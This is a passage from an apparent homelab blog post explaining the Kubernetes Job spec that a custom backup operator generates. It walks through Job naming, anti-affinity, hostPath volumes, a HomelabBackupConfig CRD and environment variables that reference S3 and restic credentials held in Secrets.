</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_CONFIG&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/hlsb-conf.yaml&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_ACCESS_KEY_ID&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;AccessKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_SECRET_KEY&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;SecretKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SERVICE_ACCESS_KEY_ID&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;AccessKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SERVICE_SECRET_KEY&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;SecretKey&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_RESTIC_PW&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;pw&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;restic-pw&#34;</span>,
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                }
</span></span><span style="display:flex;"><span>                            }
</span></span><span style="display:flex;"><span>                        ],
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;image&#34;</span>: <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hn-backup:5.0.0&#34;</span>,
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>,
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;volumeMounts&#34;</span>: [
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/audiobookshelf-abs-data-volume&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;readOnly&#34;</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>                            }
</span></span><span style="display:flex;"><span>                        ]
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                ],
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;nodeSelector&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;kubernetes.io/hostname&#34;</span>: <span style="color:#e6db74">&#34;khepri&#34;</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;priorityClassName&#34;</span>: <span style="color:#e6db74">&#34;system-node-critical&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;restartPolicy&#34;</span>: <span style="color:#e6db74">&#34;Never&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;volumes&#34;</span>: [
</span></span><span style="display:flex;"><span>                    {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;hostPath&#34;</span>: {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/4e3bcff1fd37dd7554102fbe925eef191491c4f5fd7323a4564c4008d86ee967/globalmount/0001-000c-rook-cluster-0000000000000003-642bef40-20b8-4df0-ab2f-6190c6b78d74&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>                    },
</span></span><span style="display:flex;"><span>                    {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;configMap&#34;</span>: {
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;defaultMode&#34;</span>: <span style="color:#ae81ff">420</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;backup-confmap-audiobookshelf-backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>                        },
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                ]
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This one does not fit the HLSB I&rsquo;ve been using as an example, but I hope you can
forgive that oversight. I forgot to save the JSON for one of the jobs I ran
against my example HLSB.</p>
<p>Let&rsquo;s start with the <code>metadata</code> property:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;metadata&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;labels&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;hlsb&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf_backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf-backup-audiobookshelf-5746d54b-3826-486d-b33f&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;backups&#34;</span>,
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>For identification reasons, all pieces belonging to a certain HLSB have that
HLSB&rsquo;s namespace and name in a HLSB label. In addition, they&rsquo;re all marked as
<code>part-of</code> the Homelab service backup as part of my general labeling scheme.
The name of the Job again contains the namespace and name of the HLSB and is
capped off by a random string. It is generated like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_new_job_name</span>(hlsb_name, hlsb_namespace):
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>hlsb_namespace<span style="color:#e6db74">}</span><span style="color:#e6db74">-</span><span style="color:#e6db74">{</span>hlsb_name<span style="color:#e6db74">}</span><span style="color:#e6db74">-</span><span style="color:#e6db74">{</span>uuid<span style="color:#f92672">.</span>uuid4()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    truncated_name <span style="color:#f92672">=</span> name[<span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">61</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> truncated_name[<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>] <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;-&#34;</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> truncated_name[<span style="color:#ae81ff">0</span>:<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> truncated_name
</span></span></code></pre></div><p>Creating this name was a lot more complicated than I anticipated. Because I
don&rsquo;t currently have any integration tests against a real k8s cluster, this
function was a surprising source for issues. To begin with, the name of a Job
can only be 63 chars long at maximum. So appending the full UUID lead to errors
during the initial testing. Than I thought I had it, with my test HLSB running
backups successfully. And then I implemented the above HLSB, for my
<a href="https://www.audiobookshelf.org/">Audiobookshelf</a> deployment. And I then found
that the cutoff at 61 chars I implemented left the name ending on a <code>-</code>. Which
k8s also doesn&rsquo;t allow, hence the check if the name ends on <code>-</code>. &#x1f926;</p>
<p>Another thing worth mentioning: The backup jobs run in my <code>backups</code> namespace,
not in the app&rsquo;s namespace. This is mostly so that I can comfortably keep all of
the necessary secrets in a separate namespace.</p>
<p>Then let&rsquo;s continue with the spec, more precisely the affinity I&rsquo;ve set up:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;affinity&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;podAntiAffinity&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;requiredDuringSchedulingIgnoredDuringExecution&#34;</span>: [
</span></span><span style="display:flex;"><span>            {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;labelSelector&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;matchLabels&#34;</span>: {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;topologyKey&#34;</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>This config prevents multiple backup Jobs from running on the same host. This is
necessary because sometimes, especially with larger S3 buckets to be backed up,
the rclone invocation in the backup container can use quite some resources.
Plus, I just generally didn&rsquo;t want to tax any specific node too much.</p>
<p>Next, the node selector, which ensures that the Job runs on the host where
the required volumes are mounted:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;nodeSelector&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kubernetes.io/hostname&#34;</span>: <span style="color:#e6db74">&#34;khepri&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>This is a definition computed from the values provided by the PVC probing
I&rsquo;ve described above. The volumes to be backed up get grouped by the hosts
they&rsquo;re mounted on, and then every resulting group/host gets one Job.</p>
<p>And then the more interesting part, the volumes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;volumes&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;hostPath&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;path&#34;</span>: <span style="color:#e6db74">&#34;/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/4e3bcff1fd37dd7554102fbe925eef191491c4f5fd7323a4564c4008d86ee967/globalmount/0001-000c-rook-cluster-0000000000000003-642bef40-20b8-4df0-ab2f-6190c6b78d74&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;configMap&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;defaultMode&#34;</span>: <span style="color:#ae81ff">420</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;backup-confmap-audiobookshelf-backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>The <code>hostPath.path</code> is computed as described above, via the information from the
persistent volume. And the name for the volume is defined as <code>vol-backup-pvc_namespace-pvc_name</code>.
Additionally, the ConfigMap described in the previous section also gets
mounted.</p>
<p>And finally, the container itself. Let&rsquo;s start with the command and image:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;command&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;hn-backup&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span><span style="display:flex;"><span>]<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;image&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hn-backup:5.0.0&#34;</span><span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>I&rsquo;ve kept it pretty simple. And instead of mucking around with lots of command
line switches, the configuration is done via the config file and environment
variables.
I won&rsquo;t say much about the <code>hn-backup</code> program, as it&rsquo;s mainly just a wrapper
around <a href="https://rclone.org/">rclone</a> for fetching S3 buckets to be backed up
and <a href="https://restic.net/">restic</a> for the backups themselves.</p>
<p>The volume mounts look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;volumeMounts&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/audiobookshelf-abs-data-volume&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-audiobookshelf-abs-data-volume&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;mountPath&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;vol-backup-confmap&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;readOnly&#34;</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>All mounts are done into the <code>/hlsb-mounts</code> directory in the container, which
is then used by hn-backup to construct the paths to be backed up.</p>
<p>Then there&rsquo;s the env variable. Those I use to define the common configuration.
So while the ConfigMap contains options relevant for the current Job, the
env variables contain the common configs.
These options are defined in the HomelabBackupConfig CRD, an example of which
would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackupConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-config</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scratchVol</span>: <span style="color:#ae81ff">vol-service-backup-scratch</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3-k8s.mei-home.net:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3ServiceConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3-k8s.mei-home.net:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticPasswordSecret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">restic-pw</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticRetentionPolicy</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">daily</span>: <span style="color:#ae81ff">7</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">weekly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">monthly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">yearly</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">jobSpec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">jobNS</span>: <span style="color:#e6db74">&#34;backups&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.mei-home.net/homelab/hn-backup:5.0.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;hn-backup&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span></code></pre></div><p>This CRD describes options common to all backups, so they don&rsquo;t need to be
repeated in every HomelabServiceBackup manifest.
The most important parts here are the configs for S3 access.</p>
<p><code>s3BackupConfig</code> describes access to the backup buckets to which restic will
write the backup. It contains the host, optionally with port, and how to get
the S3 credentials. Very important to me here was to be able to specify not just
the name of the Secret, but also the key inside the Secret to use for the
specific credential. Because I&rsquo;ve been pretty annoyed by some Helm charts which
only allow specifying the Secret&rsquo;s name and then expecting certain keys to exist.
Which makes using generated secrets, like those created by Ceph Rook for S3
buckets, a real pain.</p>
<p>The <code>s3ServiceConfig</code> has exactly the same structure, but provides the
credentials for access to buckets used by services, which might also be backed
up, and which might live on a completely different system. This is the case for
my Nomad cluster apps right now, for example. Their S3 buckets still live on the
baremetal Ceph cluster, while the backup buckets have already been migrated to
the Ceph Rook cluster. And I decided to make such a setup possible here as well,
just in case I wanted to migrate to a different S3 setup at some point.</p>
<p>The <code>resticPasswordSecret</code> describes the encryption password for the restic
backup repos in the individual S3 buckets.</p>
<p>All of this information is put into environment variables on the Pod running
the backup. Let&rsquo;s start with the backup credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_HOST&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;s3-k8s.mei-home.net:443&#34;</span>
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_ACCESS_KEY_ID&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;AccessKey&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_SECRET_KEY&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;valueFrom&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;secretKeyRef&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;SecretKey&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;s3-backup-buckets-cred&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;optional&#34;</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}<span style="color:#960050;background-color:#1e0010">,</span>
</span></span></code></pre></div><p>The configs for the S3 service bucket credentials are very similar, so I won&rsquo;t
repeat them here.
One noteworthy thing about the above setup, especially for the Secrets: The
ServiceAccount for the operator does not require access to any Secrets in
its namespace. Of course, that&rsquo;s a bit cosmetic - because the operator is
allowed to launch Jobs, which in turn can access the secrets. But still,
I found it nice that due to the way I&rsquo;d set things up, the operator itself
would not need to touch any Secrets.</p>
<p>More interesting might be some odds and ends I&rsquo;ve also defined in env variables,
just to make accessing them more convenient.
To my shame, I have to admit that I lied above, when I pretended that I had a
clean separation between generic config going into environment variables and
per-Job configs going into the config file. One piece of per-Job info did end
up in the environment variables, and I have absolutely no idea why I decided
to do that: The name of the backup bucket. No idea why I decided to go
inconsistent just with this one value.</p>
<p>Some other interesting variables:</p>
